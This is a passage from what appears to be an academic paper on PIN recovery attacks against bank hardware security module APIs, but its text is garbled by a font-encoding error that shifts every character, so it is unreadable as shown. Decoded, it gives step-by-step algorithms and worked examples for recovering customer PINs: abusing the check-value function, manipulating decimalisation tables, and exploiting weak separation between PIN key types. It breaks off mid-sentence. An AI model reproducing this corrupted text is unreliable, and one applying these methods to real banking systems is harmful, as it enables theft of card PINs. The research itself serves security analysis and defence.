+7KH(cid:3)FKHFN(cid:3)YDOXH(cid:3)IXQFWLRQ(cid:3)HQFU\SWV(cid:3)D(cid:3)(cid:25)(cid:23)(cid:3)ELW(cid:3)ELQDU\(cid:3)]HUR(cid:3)XQGHU(cid:3)WKH(cid:3)VXSSOLHG(cid:3)NH\(cid:17)(cid:3)(cid:3)7KH(cid:3)3,1(cid:3)YHULI\(cid:3) +IXQFWLRQ(cid:3)(cid:11)IRU(cid:3),%0(cid:3)DQG(cid:3)*%3(cid:3)DOJRULWKPV(cid:12)(cid:3)HQFU\SWV(cid:3)D(cid:3)(cid:25)(cid:23)(cid:3)ELW(cid:3)XVHU(cid:3)VXSSOLHG(cid:3)YDOLGDWLRQ(cid:3)GDWD(cid:17)(cid:3)(cid:3)7KH(cid:3)UHVXOWLQJ(cid:3) +FLSKHUWH[W(cid:3)LV(cid:3)GHFLPDOL]HG(cid:3)YLD(cid:3)D(cid:3)XVHU(cid:3)VXSSOLHG(cid:3)GHFLPDOL]DWLRQ(cid:3)WDEOH(cid:3)DQG(cid:3)WHUPHG(cid:3)WKH(cid:3)LQWHUPHGLDWH(cid:3)3,1(cid:3) +(cid:11),3,1(cid:12)(cid:17)(cid:3)(cid:3)7KH RIIVHW(cid:3)LV(cid:3)WKH(cid:3)UHVXOW(cid:3)RI(cid:3)VXEWUDFWLQJ(cid:3)WKH(cid:3),3,1(cid:3)IURP(cid:3)WKH(cid:3)FXVWRPHU(cid:3)VHOHFWHG(cid:3)3,1(cid:3)PRGXOR(cid:3)(cid:20)(cid:19)(cid:3) +(cid:11)2))6(7(cid:3) (cid:3)3,1(cid:3)(cid:16) ,3,1(cid:3)PRGXOR(cid:3)(cid:20)(cid:19)(cid:12)(cid:17)(cid:3)(cid:3)7KH(cid:3)NH\(cid:3)REVHUYDWLRQ(cid:3)LV(cid:3)WKH(cid:3)VLPLODULW\(cid:3)LQ(cid:3)RSHUDWLRQ(cid:3)EHWZHHQ(cid:3)WKH(cid:3) +FKHFN(cid:3)YDOXH(cid:3)IXQFWLRQ(cid:3)DQG(cid:3)WKH(cid:3)YHULILFDWLRQ(cid:3)IXQFWLRQ(cid:17)(cid:3)(cid:3) +&RQVLGHU(cid:3)WKH(cid:3)FDVH ZKHQ(cid:3)WKH(cid:3)YDOLGDWLRQ(cid:3)GDWD(cid:3)LV(cid:3)D(cid:3)(cid:25)(cid:23)(cid:3)ELW(cid:3)ELQDU\(cid:3)]HUR(cid:17)(cid:3)(cid:3)7KH(cid:3)UHVXOW(cid:3)RI(cid:3)WKH(cid:3)HQFU\SWLRQ(cid:3)VWDJH(cid:3) +LV(cid:3)WKH(cid:3)VDPH(cid:3)DV(cid:3)WKH(cid:3)UHVXOW(cid:3)IURP(cid:3)WKH(cid:3)FKHFN(cid:3)YDOXH(cid:3)FDOO(cid:3)(cid:11)RU(cid:3)PRUH(cid:3)DFFXUDWHO\(cid:15)(cid:3)WKH(cid:3)ILUVW(cid:3)Q(cid:3)E\WHV(cid:3)DUH(cid:3)WKH(cid:3)VDPH(cid:3) +IRU(cid:3)D(cid:3)Q(cid:3)E\WH(cid:3)FKHFN(cid:3)YDOXH(cid:12)(cid:17)(cid:3)(cid:3)7KH(cid:3)GHFLPDOL]DWLRQ(cid:3)WDEOH(cid:3)LV(cid:3)NQRZQ(cid:15)(cid:3)VR LW(cid:3)LV(cid:3)WULYLDO(cid:3)WR(cid:3)FDOFXODWH(cid:3)WKH(cid:3),3,1(cid:3)YDOXH(cid:17)(cid:3)(cid:3) +,W(cid:3)LV(cid:3)DOVR(cid:3)SRVVLEOH(cid:3)WR(cid:3)UHFRYHU(cid:3)WKH(cid:3)YDOXH(cid:3)RI(cid:3)WKH(cid:3)RIIVHW(cid:3)E\(cid:3)H[KDXVWLYH(cid:3)VHDUFK(cid:3)(cid:11)DJDLQ(cid:3)XVLQJ(cid:3)WKH(cid:3)YHULI\(cid:3) +IXQFWLRQ(cid:12)(cid:17)(cid:3)(cid:3):LWK(cid:3)NQRZOHGJH(cid:3)RI(cid:3)ERWK(cid:3)WKH(cid:3),3,1(cid:3)DQG(cid:3)RIIVHW(cid:15)(cid:3)LW(cid:3)LV(cid:3)D(cid:3)WULYLDO(cid:3)FDOFXODWLRQ(cid:3)WR(cid:3)GHWHUPLQH(cid:3)WKH(cid:3) +3,1(cid:17) +$OJRULWKP(cid:29) +(cid:20)(cid:17) &DOFXODWH(cid:3)FKHFN(cid:3)YDOXH(cid:3)RI(cid:3)NH\ +(cid:21)(cid:17) ’HFLPDOL]H(cid:3)WKH(cid:3)FKHFN(cid:3)YDOXH(cid:3)DQG(cid:3)VWRUH(cid:3)DV(cid:3),3,1 +(cid:22)(cid:17) 6HDUFK(cid:3)IRU(cid:3)WKH(cid:3)2))6(7(cid:3)(cid:11)ZLWK(cid:3)YDOLGDWLRQ(cid:3)GDWD(cid:3) (cid:3)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:12) +(cid:23)(cid:17) 5HWXUQ(cid:3)3,1(cid:3) (cid:3),3,1(cid:3)(cid:14)(cid:3)2))6(7 +(cid:20)(cid:20) + +3,1(cid:3)5HFRYHU\(cid:3)$WWDFNV +([DPSOH +3,1(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:20)(cid:21)(cid:22)(cid:23) +3,1(cid:3)YHU(cid:3)NH\(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:19)(cid:24)(cid:19)(cid:24)(cid:19)(cid:24)(cid:19)(cid:24)(cid:19)(cid:24)(cid:19)(cid:24)(cid:19)(cid:24)(cid:19)(cid:24) +9DOLGDWLRQ(cid:3)GDWD(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19)(cid:19) +’HFLPDOL]DWLRQ(cid:3)7DEOH(cid:3)(cid:19)(cid:20)(cid:21)(cid:22)(cid:23)(cid:24)(cid:25)(cid:26)(cid:27)(cid:28)(cid:19)(cid:20)(cid:21)(cid:22)(cid:23)(cid:24) +2))6(7(cid:11)VHDUFKHG(cid:12)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:22)(cid:19)(cid:22)(cid:23)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3) +&KHFN(cid:3)9DOXH(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:27)&$(cid:19)(cid:28)(cid:25)(cid:23) +,3,1(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:27)(cid:21)(cid:19)(cid:19)(cid:3)(cid:11) (cid:3)WKH(cid:3)FKHFN(cid:3)YDOXH(cid:3)GHFLPDOL]HG(cid:12) +&DOFXODWHG(cid:3)3,1 (cid:20)(cid:21)(cid:22)(cid:23)(cid:3)(cid:11) (cid:3)2))6(7(cid:3)(cid:14)(cid:3),3,1(cid:12) +$(cid:3)IHZ(cid:3)REVHUYDWLRQV(cid:17)(cid:3)(cid:3)7KH(cid:3)DWWDFN(cid:3)(cid:11)DV(cid:3)DOZD\V(cid:12)(cid:3)DFFHSWV(cid:3)DQ(cid:3)HQFU\SWHG(cid:3)3,1(cid:3)EORFN(cid:3)DQG(cid:3)LWV(cid:3)DVVRFLDWHG(cid:3) +(cid:11)HQFU\SWHG(cid:12)(cid:3)3,1(cid:3)HQFU\SWLQJ(cid:3)NH\(cid:17)(cid:3)(cid:3)7KH(cid:3)DFWXDO(cid:3)YDOXH(cid:3)RI(cid:3)WKH(cid:3)3,1(cid:3)YHULILFDWLRQ(cid:3)NH\(cid:3)LV(cid:3)QRW(cid:3)LPSRUWDQW(cid:15)(cid:3)KHQFH(cid:3) +RQH(cid:3)FDQ(cid:3)PHUHO\(cid:3)FRQMXUH(cid:3)WKH(cid:3)NH\(cid:3)(cid:11)LI(cid:3)SRVVLEOH(cid:12)(cid:3)RU(cid:3)XVH(cid:3)DQ\(cid:3)RWKHU(cid:3)3,1(cid:3)YHULILFDWLRQ(cid:3)NH\(cid:3)LQ(cid:3)WKH(cid:3)V\VWHP(cid:17)(cid:3)(cid:3)7KH(cid:3) +DWWDFN(cid:3)LV(cid:3)IDLUO\(cid:3)HIILFLHQW(cid:15)(cid:3)UHTXLULQJ(cid:3)RQO\(cid:3)D(cid:3)VLQJOH(cid:3)VHDUFK(cid:3)IRU(cid:3)WKH(cid:3)RIIVHW(cid:3)(cid:11)(cid:20)(cid:19)(cid:19)(cid:19)(cid:19)(cid:3)(cid:14)(cid:3)(cid:11)Q(cid:16)(cid:23)(cid:12)(cid:3)x (cid:20)(cid:19)(cid:3)TXHULHV(cid:12)(cid:17) +(cid:26)(cid:17)(cid:21)(cid:17) 7KH(cid:3)’HFLPDOL]DWLRQ(cid:3)’DWD(cid:3)$WWDFN(cid:3)DJDLQVW(cid:3)2IIVHWV +6LQFH(cid:3)WKH(cid:3)XVHU(cid:3)VXSSOLHV(cid:3)WKH(cid:3)GHFLPDOL]DWLRQ(cid:3)WDEOH(cid:3)WR(cid:3)WKH(cid:3)FDOO(cid:15)(cid:3)LW(cid:3)LV(cid:3)SRVVLEOH(cid:3)WR(cid:3)UHSHDWHGO\(cid:3)TXHU\(cid:3)WKH(cid:3) +WDUJHW(cid:3)ZLWK(cid:3)PRGLILFDWLRQV(cid:3)WR(cid:3)WKH(cid:3)WDEOH(cid:17)(cid:3)(cid:3)6XSSRVH(cid:3)ZH(cid:3)NQRZ(cid:3)WKH(cid:3)RIIVHW(cid:3)IRU(cid:3)D(cid:3)JLYHQ(cid:3)3,1(cid:3)EORFN(cid:3)(cid:11)XVLQJ(cid:3)D(cid:3) +JLYHQ(cid:3)GHFLPDOL]DWLRQ(cid:3)WDEOH(cid:12)(cid:17)(cid:3)(cid:3)&RQVLGHU(cid:3)WKH(cid:3)HIIHFW(cid:3)RI(cid:3)FKDQJLQJ(cid:3)D(cid:3)VLQJOH(cid:3)HOHPHQW(cid:3)LQ(cid:3)WKH(cid:3)WDEOH(cid:3)(cid:11)WKH(cid:3)LWK GLJLW(cid:3) +LQ(cid:3)WKH(cid:3)WDEOH(cid:3)PDSSLQJ(cid:3)^L(cid:3)o M(cid:15)(cid:3)L(cid:3)(cid:143)= (cid:15)(cid:3)M (cid:143)= ‘(cid:17)(cid:3)(cid:3) +L (cid:20)(cid:25) L (cid:20)(cid:19) +,I(cid:3)WKH(cid:3)KH[DGHFLPDO(cid:3)GLJLW(cid:3)L(cid:3)ZDV(cid:3)QRW(cid:3)IRXQG(cid:3)LQ(cid:3)WKH(cid:3)ILUVW(cid:3)Q(cid:3)GLJLWV(cid:3)RI(cid:3)FLSKHUWH[W(cid:15)(cid:3)WKHQ(cid:3)WKHUH(cid:3)LV(cid:3)QR(cid:3)FKDQJH(cid:3)LQ(cid:3) +WKH(cid:3)YDOXH(cid:3)RI(cid:3),3,1(cid:15)(cid:3)DQG(cid:3)WKH(cid:3)VDPH(cid:3)YDOXH(cid:3)RI(cid:3)WKH(cid:3)RIIVHW(cid:3)ZLOO(cid:3)SDVV(cid:3)WKH(cid:3)YHULI\(cid:3)FDOO(cid:17)(cid:3)(cid:3)+RZHYHU(cid:15)(cid:3)IRU(cid:3)HDFK(cid:3) +LQVWDQFH(cid:3)RI(cid:3)L(cid:3)LQ(cid:3)WKH(cid:3)FLSKHUWH[W(cid:15)(cid:3)WKH(cid:3)FRUUHVSRQGLQJ(cid:3)GLJLW(cid:3)RI(cid:3),3,1(cid:3)ZLOO(cid:3)EH(cid:3)UHPDSSHG(cid:3)WR(cid:3)M(cid:10)(cid:17)(cid:3)(cid:3)7KH(cid:3)RULJLQDO(cid:3) +L +RIIVHW(cid:3)ZLOO(cid:3)QRZ(cid:3)IDLO(cid:3)WKH(cid:3)YHULI\(cid:3)FDOO(cid:17)(cid:3)(cid:3)8VLQJ(cid:3)WKLV(cid:3)DSSURDFK(cid:3)ZH(cid:3)FDQ(cid:3)LGHQWLI\(cid:3)WKH(cid:3)SRVVLEOH(cid:3)YDOXHV(cid:3)RI(cid:3)WKH(cid:3) +KH[DGHFLPDO(cid:3)GLJLWV(cid:3)LQ(cid:3)WKH(cid:3)ILUVW(cid:3)Q(cid:3)GLJLWV(cid:3)RI(cid:3)WKH(cid:3)FLSKHUWH[W(cid:17) +7KLV(cid:3)WHFKQLTXH(cid:3)FDQ(cid:3)EH(cid:3)IXUWKHU(cid:3)VWUHQJWKHQ(cid:3)E\(cid:3)VHWWLQJ(cid:3)M(cid:10)(cid:3) (cid:3)M (cid:14)(cid:3)N(cid:3)ZKHUH(cid:3)N(cid:3)LV(cid:3)D(cid:3)NQRZQ(cid:3)(cid:11)QRQ(cid:3)]HUR(cid:12)(cid:3)YDOXH(cid:3) +L L +(cid:11)DGGLWLRQ(cid:3)LV(cid:3)PRGXOR(cid:3)(cid:20)(cid:19)(cid:12)(cid:17)(cid:3)(cid:3)’XH(cid:3)WR(cid:3)WKH(cid:3)VLPSOH(cid:3)UHODWLRQVKLS(cid:3)EHWZHHQ(cid:3)WKH(cid:3)RIIVHW(cid:3)DQG(cid:3)WKH(cid:3),3,1(cid:15)(cid:3)ZH(cid:3)NQRZ(cid:3)WKDW(cid:3) +E\(cid:3)DGGLQJ(cid:3)N(cid:3)WR(cid:3)D(cid:3)GLJLW(cid:3)LQ(cid:3)WKH(cid:3),3,1(cid:15)(cid:3)WKH(cid:3)FRUUHVSRQGLQJ(cid:3)GLJLW(cid:3)LQ(cid:3)WKH(cid:3)RIIVHW(cid:3)LV(cid:3)UHGXFHG(cid:3)E\(cid:3)N(cid:17)(cid:3)(cid:3)7KXV(cid:3)ZH(cid:3)FDQ(cid:3) +VHDUFK(cid:3)WKURXJK(cid:3)DOO(cid:3)SRVVLEOH(cid:3)FLSKHUWH[W(cid:3)GLJLW(cid:3)ORFDWLRQV(cid:3)WKDW(cid:3)FRQWDLQ(cid:3)L(cid:15)(cid:3)E\(cid:3)PRGLI\LQJ(cid:3)WKH(cid:3)RIIVHW(cid:3)YDOXH(cid:3)DQG(cid:3) +VXSSO\LQJ(cid:3)WKH(cid:3)PRGLILHG(cid:3)RIIVHW(cid:3)DQG(cid:3)GHFLPDOL]DWLRQ(cid:3)WDEOH(cid:3)WR(cid:3)WKH(cid:3)YHULI\(cid:3)IXQFWLRQ(cid:17)(cid:3)(cid:3)$IWHU(cid:3)DW(cid:3)PRVW(cid:3)(cid:21)Q +TXHULHV(cid:15)(cid:3)ZH(cid:3)ZLOO(cid:3)KDYH(cid:3)LGHQWLILHG(cid:3)DOO(cid:3)GLJLW(cid:3)ORFDWLRQV(cid:3)LQ(cid:3)WKH(cid:3)FLSKHUWH[W(cid:3)ZLWK(cid:3)WKH(cid:3)YDOXH(cid:3)L(cid:17)(cid:3)(cid:3)%\(cid:3)UHSHDWLQJ(cid:3) +WKURXJK(cid:3)DOO(cid:3)SRVVLEOH(cid:3)YDOXHV(cid:3)RI(cid:3)L(cid:15)(cid:3)ZH(cid:3)FDQ(cid:3)XQLTXHO\(cid:3)GHWHUPLQH(cid:3)WKH(cid:3)YDOXH(cid:3)RI(cid:3)WKH(cid:3)ILUVW(cid:3)Q(cid:3)GLJLWV(cid:3)RI(cid:3)FLSKHUWH[W(cid:3) +DQG(cid:3)WKXV(cid:3),3,1(cid:17)(cid:3)(cid:3)$JDLQ(cid:3)VLQFH(cid:3)ZH(cid:3)NQRZ(cid:3)WKH(cid:3)RIIVHW(cid:3)DQG(cid:3),3,1(cid:15)(cid:3)ZH(cid:3)FDQ(cid:3)WULYLDOO\(cid:3)FDOFXODWH(cid:3)WKH(cid:3)YDOXH(cid:3)RI(cid:3)WKH(cid:3) +3,1(cid:17) +$OJRULWKP(cid:29) +(cid:20)(cid:17) 6HDUFK(cid:3)IRU(cid:3)RIIVHW(cid:3)(cid:11)GHFLPDOL]DWLRQ(cid:3)WDEOH(cid:3)LV(cid:3)L(cid:3)o L(cid:3)PRG(cid:3)(cid:20)(cid:19)(cid:12) +(cid:21)(cid:17) )RU(cid:3)L(cid:3) (cid:3)(cid:19)(cid:17)(cid:17)(cid:20)(cid:24) +(cid:21)(cid:17)(cid:20)(cid:17) 5HSODFH(cid:3)WKH(cid:3)HQWU\(cid:3)L(cid:3)oL(cid:3)PRG(cid:3)(cid:20)(cid:19)(cid:15)(cid:3)ZLWK(cid:3)L(cid:3)oL(cid:3)(cid:14)(cid:3)N(cid:3)PRG(cid:3)(cid:20)(cid:19) +(cid:21)(cid:17)(cid:21)(cid:17) )RU(cid:3)HDFK(cid:3)SRVVLEOH(cid:3)ORFDWLRQ(cid:3)RI(cid:3)L(cid:3)LQ(cid:3)WKH(cid:3)FLSKHUWH[W(cid:3)(cid:11)LQFOXGLQJ(cid:3)QRQH(cid:12)(cid:17) +(cid:21)(cid:17)(cid:21)(cid:17)(cid:20)(cid:17)7HVW(cid:3)WKH(cid:3)FRUUHVSRQGLQJ(cid:3)PRGLILHG(cid:3)RIIVHW(cid:17) +(cid:21)(cid:17)(cid:21)(cid:17)(cid:21)(cid:17) ,I(cid:3)¶SDVV•(cid:15)(cid:3)WKHQ(cid:3)VWRUH(cid:3)ORFDWLRQV(cid:3)RI(cid:3)L(cid:3)LQ(cid:3)FLSKHUWH[W(cid:17) +(cid:22)(cid:17) ’HFLPDOL]H(cid:3)WKH(cid:3)¶UHFRYHUHG•(cid:3)FLSKHUWH[W(cid:3)DQG(cid:3)VWRUH(cid:3)DV(cid:3),3,1 +(cid:23)(cid:17) 5HWXUQ(cid:3)3,1(cid:3) (cid:3),3,1(cid:3)(cid:14)(cid:3)2))6(7 +(cid:20)(cid:21) + +3,1(cid:3)5HFRYHU\(cid:3)$WWDFNV +([DPSOH(cid:29) +3,1(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:25)(cid:24)(cid:28)(cid:27) +3,1(cid:3)YHU(cid:3)NH\(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:19)(cid:24)(cid:19)(cid:24)(cid:19)(cid:24)(cid:19)(cid:24)(cid:19)(cid:24)(cid:19)(cid:24)(cid:19)(cid:24)(cid:19)(cid:24) +9DOLGDWLRQ(cid:3)GDWD (cid:20)(cid:20)(cid:21)(cid:21)(cid:22)(cid:22)(cid:23)(cid:23)(cid:24)(cid:24)(cid:25)(cid:25)(cid:26)(cid:26)(cid:27)(cid:27) +’HFLPDOL]DWLRQ(cid:3)7DEOH(cid:3)(cid:19)(cid:20)(cid:21)(cid:22)(cid:23)(cid:24)(cid:25)(cid:26)(cid:27)(cid:28)(cid:19)(cid:20)(cid:21)(cid:22)(cid:23)(cid:24) +&LSKHUWH[W(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)((cid:23)(cid:27)(cid:20))&(cid:24)(cid:25)(cid:24)(cid:27)(cid:22)(cid:28)(cid:20)(cid:23)(cid:20)(cid:27) +,3,1(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:23)(cid:23)(cid:27)(cid:20) +2))6(7(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:21)(cid:20)(cid:20)(cid:26) +0RGLILFDWLRQ(cid:3)(cid:20) +’HF(cid:3)7DEOH(cid:3)(cid:11)(cid:19)(cid:12)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:20)(cid:20)(cid:21)(cid:22)(cid:23)(cid:24)(cid:25)(cid:26)(cid:27)(cid:28)(cid:19)(cid:20)(cid:21)(cid:22)(cid:23)(cid:24) +,3,1(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:23)(cid:23)(cid:27)(cid:20) +2))6(7(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:21)(cid:20)(cid:20)(cid:26)(cid:3)(cid:11)ZLOO(cid:3)SDVV(cid:12) ++HQFH(cid:3)WKH(cid:3)GLJLW(cid:3)(cid:10)(cid:19)(cid:10)(cid:3)LV(cid:3)QRW(cid:3)IRXQG(cid:3)LQ(cid:3)WKH(cid:3)ILUVW(cid:3)IRXU(cid:3)GLJLWV(cid:3)RI(cid:3)WKH(cid:3)FLSKHUWH[W(cid:17) +0RGLILFDWLRQ(cid:3)(cid:21) +’HF(cid:3)7DEOH(cid:3)(cid:11)(cid:20)(cid:12)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:19)(cid:21)(cid:21)(cid:22)(cid:23)(cid:24)(cid:25)(cid:26)(cid:27)(cid:28)(cid:19)(cid:20)(cid:21)(cid:22)(cid:23)(cid:24) +,3,1(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:23)(cid:23)(cid:27)(cid:21) +2))6(7(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:3)(cid:21)(cid:20)(cid:20)(cid:25)(cid:3)(cid:11)ZLOO(cid:3)SDVV(cid:12) +7KXV(cid:3)ZH(cid:3)KDYH(cid:3)LGHQWLILHG(cid:3)WKDW(cid:3)WKH(cid:3)IRXUWK(cid:3)GLJLW(cid:3)RI(cid:3)WKH(cid:3)FLSKHUWH[W(cid:3)LV(cid:3)(cid:20)(cid:17) +,QLWLDOO\(cid:3)ZH(cid:3)UHTXLUH(cid:3)WKH(cid:3)YDOXH(cid:3)RI(cid:3)WKH(cid:3)RIIVHW(cid:3)(cid:11)UHTXLULQJ(cid:3)(cid:20)(cid:3)VHDUFK(cid:3)RU(cid:3)(cid:20)(cid:19)(cid:19)(cid:19)(cid:19)(cid:3)(cid:14)(cid:3)(cid:11)Q(cid:16)(cid:23)(cid:12)(cid:3)x (cid:20)(cid:19)(cid:3)TXHULHV(cid:3)(cid:12)(cid:17)(cid:3)(cid:3)7KH(cid:3) +UHVW(cid:3)RI(cid:3)WKH(cid:3)DOJRULWKP(cid:3)UHTXLUHV(cid:3)DW(cid:3)PRVW (cid:20)(cid:25)(cid:3)x (cid:21)Q TXHULHV(cid:17)(cid:3)(cid:3)7KH(cid:3)VDPH(cid:3)FRPPHQWV(cid:3)DSSO\(cid:3)WR(cid:3)WKH(cid:3)3,1(cid:3) +YHULILFDWLRQ(cid:3)NH\(cid:3)DV(cid:3)LQ(cid:3)WKH(cid:3)SUHYLRXV(cid:3)DWWDFN(cid:17) +(cid:27)(cid:17) .H\(cid:3)6HSDUDWLRQ(cid:3)$WWDFNV +$V(cid:3)PHQWLRQHG(cid:3)EHIRUH(cid:15)(cid:3)WKH(cid:3)SULQFLSOH(cid:3)RI(cid:3)NH\(cid:3)VHSDUDWLRQ(cid:3)EHWZHHQ(cid:3)JHQHULF(cid:3)NH\(cid:3)W\SHV(cid:3)(cid:11)H(cid:17)J(cid:17)(cid:3)GDWD(cid:3)DQG(cid:3)3,1(cid:3) +NH\V(cid:12)(cid:3)LV(cid:3)XQGHUVWRRG(cid:3)DQG(cid:3)LPSOHPHQWHG(cid:3)E\(cid:3)PDQ\(cid:3)$3,(cid:10)V(cid:17)(cid:3)(cid:3)+RZHYHU(cid:15)(cid:3)WKH(cid:3)JUDQXODULW\(cid:3)RI(cid:3)VHSDUDWLRQ(cid:3)UHTXLUHG(cid:15)(cid:3) +LV(cid:3)QRW(cid:3)XQGHUVWRRG(cid:17)(cid:3)(cid:3):H(cid:3)VKRZ(cid:3)DWWDFNV(cid:3)DJDLQVW(cid:3)D(cid:3)VXUSULVLQJO\(cid:3)ILQH(cid:3)OHYHO(cid:3)RI(cid:3)JUDQXODULW\(cid:17) +:H(cid:3)GHVFULEH(cid:3),%0(cid:10)V(cid:3)QDPLQJ(cid:3)(cid:11)DQG(cid:3)VHSDUDWLRQ(cid:12)(cid:3)RI(cid:3)3,1(cid:3)NH\V(cid:15)(cid:3)VLQFH(cid:3)WKH\(cid:3)RIIHU(cid:3)WKH(cid:3)KLJKHVW(cid:3)OHYHO(cid:3)RI(cid:3) +JUDQXODULW\(cid:3)RI(cid:3)WKH(cid:3)FRPPHUFLDO(cid:3)$3,(cid:10)V(cid:3)LQYHVWLJDWHG(cid:3)E\(cid:3)WKH(cid:3)DXWKRUV(cid:17)(cid:3)(cid:3)7KLV(cid:3)QDPLQJ(cid:3)(cid:11)DQG(cid:3)VHSDUDWLRQ(cid:12)(cid:3)LV(cid:3)DOVR +FRQVLVWHQW(cid:3)DFURVV(cid:3)WKH(cid:3),%0(cid:3),&6)(cid:15)(cid:3),%0(cid:3)766(cid:3)DQG(cid:3),%0(cid:3)&&$(cid:3)$3,(cid:10)V(cid:3)(cid:16) DOO(cid:3)RI(cid:3)ZKLFK(cid:3)XVH(cid:3)FRQWURO(cid:3)YHFWRUV(cid:3)WR(cid:3) +DFKLHYH(cid:3)VHSDUDWLRQ(cid:17) +x $(cid:3)3,1*(1 NH\(cid:15)(cid:3)LV(cid:3)D(cid:3)3,1(cid:3)JHQHUDWLQJ(cid:3)NH\(cid:15)(cid:3)DQG(cid:3)LV(cid:3)WKH(cid:3)RQO\(cid:3)NH\(cid:3)W\SH(cid:3)DOORZHG(cid:3)IRU(cid:3)XVH(cid:3)LQ(cid:3)WKH(cid:3) +JHQHUDWH(cid:3)3,1(cid:3)IXQFWLRQ +x $(cid:3)3,19(5 NH\(cid:15)(cid:3)LV(cid:3)D(cid:3)3,1(cid:3)YHULI\LQJ(cid:3)NH\(cid:15)(cid:3)DQG(cid:3)LV(cid:3)WKH(cid:3)RQO\(cid:3)NH\(cid:3)W\SH(cid:3)DOORZHG(cid:3)IRU(cid:3)XVH(cid:3)LQ(cid:3)SHUIRUPLQJ(cid:3) +WKH(cid:3)YHULILFDWLRQ(cid:3)LQ(cid:3)WKH(cid:3)YHULI\(cid:3)IXQFWLRQ +x $Q(cid:3),3,1(1& NH\(cid:15)(cid:3)LV(cid:3)D(cid:3)LQSXW(cid:3)3,1(cid:3)HQFU\SWLQJ(cid:3)NH\(cid:17)(cid:3)(QFU\SWHG(cid:3)3,1(cid:3)EORFNV(cid:3)VXSSOLHG(cid:3)WR(cid:3)DQ\(cid:3)RI(cid:3)WKH(cid:3) +3,1(cid:3)IXQFWLRQV(cid:15)(cid:3)DUH(cid:3)HQFU\SWHG(cid:3)XQGHU(cid:3)D(cid:3)NH\(cid:3)RI(cid:3)WKLV(cid:3)W\SH(cid:17) +x $Q(cid:3)23,1(1& NH\(cid:15)(cid:3)LV(cid:3)D(cid:3)RXWSXW(cid:3)3,1(cid:3)HQFU\SWLQJ(cid:3)NH\(cid:17)(cid:3)(cid:3)7KH(cid:3)RXWSXW(cid:3)HQFU\SWHG(cid:3)3,1(cid:3)EORFNV(cid:3)IURP(cid:3)DQ\(cid:3) +RI(cid:3)WKH(cid:3)3,1(cid:3)IXQFWLRQ(cid:15)(cid:3)DUH(cid:3)HQFU\SWHG(cid:3)XQGHU(cid:3)D(cid:3)NH\(cid:3)RI(cid:3)WKLV(cid:3)W\SH(cid:17) +0RUH(cid:3)GHWDLOV(cid:3)FDQ(cid:3)EH(cid:3)IRXQG(cid:3)LQ(cid:3)WKH(cid:3),%0(cid:3)PDQXDOV(cid:17) +(cid:27)(cid:17)(cid:20)(cid:17) ([KDXVWLYH(cid:3)3,1(cid:3)VHDUFK(cid:3)DQG(cid:3)&RGH(cid:3)%RRN(cid:3)$WWDFNV(cid:3)EDVHG(cid:3)RQ(cid:3)WKH(cid:3)IDLOXUH(cid:3) WR(cid:3) +VHSDUDWH(cid:3)3,1*(1(cid:18)3,19(5(cid:3)DQG(cid:3),3,1(1&(cid:18)23,1(1&(cid:3)NH\V +:H(cid:3)GHVFULEH(cid:3)D(cid:3)H[KDXVWLYH(cid:3)3,1(cid:3)VHDUFK(cid:3)DWWDFN(cid:3)H[SORLWV(cid:3)D(cid:3)ODFN(cid:3)RI(cid:3)VHSDUDWLRQ(cid:3)EHWZHHQ(cid:3)3,1*(1(cid:18)3,19(5(cid:3) +DQG(cid:3) ,3,1(1&(cid:18)23,1(1&(cid:3) NH\V(cid:3) WR(cid:3) SHUIRUP(cid:3) WKH(cid:3) VHDUFK(cid:17)(cid:3) (cid:3) 